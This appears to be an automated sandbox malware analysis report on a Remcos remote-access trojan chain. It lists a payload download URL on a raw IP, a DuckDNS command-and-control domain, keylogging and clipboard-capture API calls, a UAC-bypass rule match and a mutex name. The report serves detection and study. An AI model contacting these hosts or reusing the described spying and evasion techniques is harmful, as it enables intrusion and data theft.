                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: global trafficDNS traffic detected: DNS query: remyma.duckdns.org
                      Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                      Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
                      Source: x.exe, 00000003.00000002.1512945011.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1512945011.00000000035CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3
                      Source: powershell.exe, 00000000.00000002.1443530900.000000000605D000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1512945011.0000000003541000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000000.1433913924.0000000000092000.00000002.00000001.01000000.00000009.sdmp, x.exe.0.drString found in binary or memory: http://176.65.144.3/dev/cozyrem.exe
                      Source: RegAAsm.exe, 00000004.00000003.1536498847.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                      Source: RegAAsm.exe, 00000004.00000003.1536498847.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/$
                      Source: RegAAsm.exe, 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000003.1536498847.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000003.1536498847.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000003.1536770834.0000000000701000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000002.3887419828.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                      Source: x.exe, 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, RegAAsm.exe, 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, RegAAsm.exe.3.drString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: RegAAsm.exe, 00000004.00000003.1536498847.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000002.3887419828.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp2
                      Source: RegAAsm.exe, 00000004.00000003.1536498847.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpF
                      Source: RegAAsm.exe, 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpFS
                      Source: RegAAsm.exe, 00000004.00000003.1536498847.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000002.3887419828.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpO
                      Source: RegAAsm.exe, 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                      Source: RegAAsm.exe, 00000004.00000003.1536498847.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000002.3887419828.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpb
                      Source: powershell.exe, 00000000.00000002.1443530900.000000000605D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000000.00000002.1437118971.0000000005036000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000000.00000002.1437118971.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1512945011.00000000035CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000000.00000002.1437118971.0000000005036000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000000.00000002.1437118971.0000000004EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 00000000.00000002.1443530900.000000000605D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000000.00000002.1443530900.000000000605D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000000.00000002.1443530900.000000000605D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000000.00000002.1437118971.0000000005036000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000000.00000002.1443530900.000000000605D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00409D1E SetWindowsHookExA 0000000D,00409D0A,000000004_2_00409D1E
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,4_2_0040B158
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0041696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_0041696E
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,4_2_0040B158
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00409E4A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,4_2_00409E4A
                      Source: Yara matchFile source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 7332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAAsm.exe PID: 7516, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 7332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAAsm.exe PID: 7516, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0041CF2D SystemParametersInfoW,4_2_0041CF2D

                      System Summary

                      barindex
                      Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 8168, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: x.exe PID: 7332, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: RegAAsm.exe PID: 7516, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0041C077 OpenProcess,NtSuspendProcess,CloseHandle,4_2_0041C077
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0041C0A3 OpenProcess,NtResumeProcess,CloseHandle,4_2_0041C0A3
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00416861 ExitWindowsEx,LoadLibraryA,GetProcAddress,4_2_00416861
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0042809D4_2_0042809D
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0045412B4_2_0045412B
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_004421C04_2_004421C0
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_004281D74_2_004281D7
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0043E1E04_2_0043E1E0
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0041E29B4_2_0041E29B
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_004373DA4_2_004373DA
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_004383804_2_00438380
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_004534724_2_00453472
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0042747E4_2_0042747E
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0043E43D4_2_0043E43D
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_004325A14_2_004325A1
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0043774C4_2_0043774C
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0041F8094_2_0041F809
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_004379F64_2_004379F6
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_004279F54_2_004279F5
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0044DAD94_2_0044DAD9
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00433C734_2_00433C73
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00413CA04_2_00413CA0
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00437CBD4_2_00437CBD
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0043DD824_2_0043DD82
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00435F524_2_00435F52
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00437F784_2_00437F78
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0043DFB14_2_0043DFB1
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RegAAsm.exe 489A4758EA8E46736DC0F67DA790EEBA6D5244DE889DCEE5FF49DCD6E9929736
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: String function: 004351E0 appears 55 times
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: String function: 00401F96 appears 49 times
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: String function: 00401EBF appears 36 times
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: String function: 00434ACF appears 44 times
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: String function: 00402117 appears 40 times
                      Source: x.exe.0.drStatic PE information: No import functions for PE file found
                      Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 8168, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: x.exe PID: 7332, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: RegAAsm.exe PID: 7516, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winPS1@7/9@3/3
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00417AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,4_2_00417AD9
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0040C03C GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,4_2_0040C03C
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0041B9AB FindResourceA,LoadResource,LockResource,SizeofResource,4_2_0041B9AB
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_0041AC43
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x.exe.logJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-7J4RV4
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tvur0s1n.fqt.ps1Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: Rmc-7J4RV44_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: -Sys4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: Rmc-7J4RV4-Sys4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: Software\4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: TcG4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: Rmc-7J4RV4-Sys4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: $cG4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: TcG4_2_0040E560
